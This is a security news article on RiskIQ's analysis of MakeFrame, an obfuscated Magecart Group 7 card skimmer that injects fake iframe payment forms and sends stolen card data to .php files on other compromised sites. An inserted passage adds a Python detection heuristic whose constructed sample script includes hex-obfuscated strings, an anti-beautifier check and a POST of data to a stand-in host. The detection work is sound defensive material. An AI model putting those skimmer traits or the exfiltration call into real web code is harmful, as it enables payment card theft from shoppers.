Magecart Hackers Continue Improving Skimmers

A Magecart threat actor tracked as “Group 7” has been using a skimmer that creates iframes to steal payment card data, RiskIQ reveals.

Various versions of the skimmer have been observed since January, featuring different levels of obfuscation, and 19 victim sites have been identified to date. In some cases, a compromised website was abused to host the skimming code, to load that code onto other compromised websites, and to receive the exfiltrated data.

The skimmer, which RiskIQ dubbed MakeFrame, features hex-encoded strings and several layers of obfuscation, as well as an anti-analysis technique employing a check for beautifiers (which make code more readable for threat analysts). The code doesn’t execute properly if it has been beautified.

“This check means that a researcher has to deal with the blob of code if they want to deobfuscate it. For analysts experienced with deobfuscation, it just costs more time; for ones who are not, it could prevent them from figuring out what the code is doing,” RiskIQ explains.

Analysis of the malicious code revealed objects that directly refer to the creation of iframes for skimming payment data. The iframes are created so that the victim enters payment data into them. One function is called to format the fake payment form, while another creates the “submit” button.

Thus, if the victim fills out the form and then presses the “submit” button, the card data is skimmed.

RiskIQ’s security researchers discovered three distinct versions of the skimmer, including in-development versions running debug processes, one of which even carries a version number.

The skimmer was observed hosted on all of the 19 infected domains identified to date, with the stolen data sent to the same server or another compromised domain.

“This method of exfiltration is the same as that used by Magecart Group 7, sending stolen data as .php files to other compromised sites for exfiltration. Each compromised site used for data exfil has also been injected with a skimmer and has been used to host skimming code loaded on other victim sites as well,” the researchers explain.
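The traits described above (hex-encoded strings, a check that refuses to run once the code has been beautified, dynamic iframe creation for a fake card form, and exfiltration to a .php endpoint on another site) can be turned into a coarse static triage heuristic. The following is an added example, not RiskIQ's tooling or the MakeFrame code; the two script samples are constructed, and the regexes are assumptions about what such traits look like in source.

```python
import re

# Constructed samples (not the MakeFrame code itself): one benign snippet and one
# imitating the traits the article describes: hex-encoded strings, a check that
# refuses to run once the code is beautified, iframe creation, and a POST to a .php
# endpoint on another host.
BENIGN = "document.getElementById('total').textContent = fmt(price);"
SUSPECT = (
    "var a=['\\x69\\x66\\x72\\x61\\x6d\\x65',"                 # 'iframe'
    "'\\x63\\x61\\x72\\x64\\x6e\\x75\\x6d\\x62\\x65\\x72'];"   # 'cardnumber'
    "if(/\\n\\s+/.test(f.toString()))return;"                  # bail out if whitespace was added
    "var i=document.createElement(a[0]);"
    "fetch('//example.invalid/gate.php',{method:'POST',body:d});"
)

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Beautifier check (assumed shape): a regex literal containing \n or \s applied
# to some function's toString() output.
SELF_CHECK = re.compile(r"/[^/]*\\[ns][^/]*/\.test\(\s*[\w.]+\.toString\(\)\s*\)")
PHP_ENDPOINT = re.compile(r"[\w./-]+\.php\b")
CARD_FIELDS = ("cardnumber", "card_number", "ccnum", "cvv", "cvc", "expiry")


def decode_hex_strings(src: str) -> str:
    """Resolve \\xNN escapes so keywords hidden as hex become searchable."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), src)


def skimmer_indicators(src: str) -> dict:
    """Return the per-trait findings for one script body."""
    decoded = decode_hex_strings(src)
    lowered = decoded.lower()
    return {
        "hex_escapes": len(HEX_ESCAPE.findall(src)),
        "creates_iframe": "createelement(" in lowered and "iframe" in lowered,
        "anti_beautifier": SELF_CHECK.search(decoded) is not None,
        "card_fields": any(f in lowered for f in CARD_FIELDS),
        "php_exfil": PHP_ENDPOINT.search(lowered) is not None,
    }


def skimmer_score(src: str) -> int:
    """Count traits present; hex density counts as one trait above a threshold."""
    ind = skimmer_indicators(src)
    return int(ind["hex_escapes"] >= 8) + sum(
        ind[k] for k in ("creates_iframe", "anti_beautifier", "card_fields", "php_exfil"))


if __name__ == "__main__":
    for name, src in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, skimmer_score(src), skimmer_indicators(src))
```

Individual traits (a .php endpoint, hex escapes) are common on legitimate sites; the score is a triage aid for prioritising manual review of scripts served on checkout pages, not a verdict.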

Similarities in technique and code construction led RiskIQ to the conclusion that Magecart Group 7 is behind the new skimmer.

The researchers were also able to link the skimmer to two IP addresses running Debian, Apache, and OpenSSH, owned by Online SAS, a French cloud computing and web hosting company.

Magecart attacks went up by 20% amid the current COVID-19 pandemic, likely fueled by an increase in online shopping as people are working from home.

“This latest skimmer from Group 7 is an illustration of their continued evolution, honing tried and true techniques and developing new ones all the time. They are not alone in their endeavors to improve, persist, and expand their reach,” RiskIQ notes.


Written By

Ionut Arghire is an international correspondent for SecurityWeek.
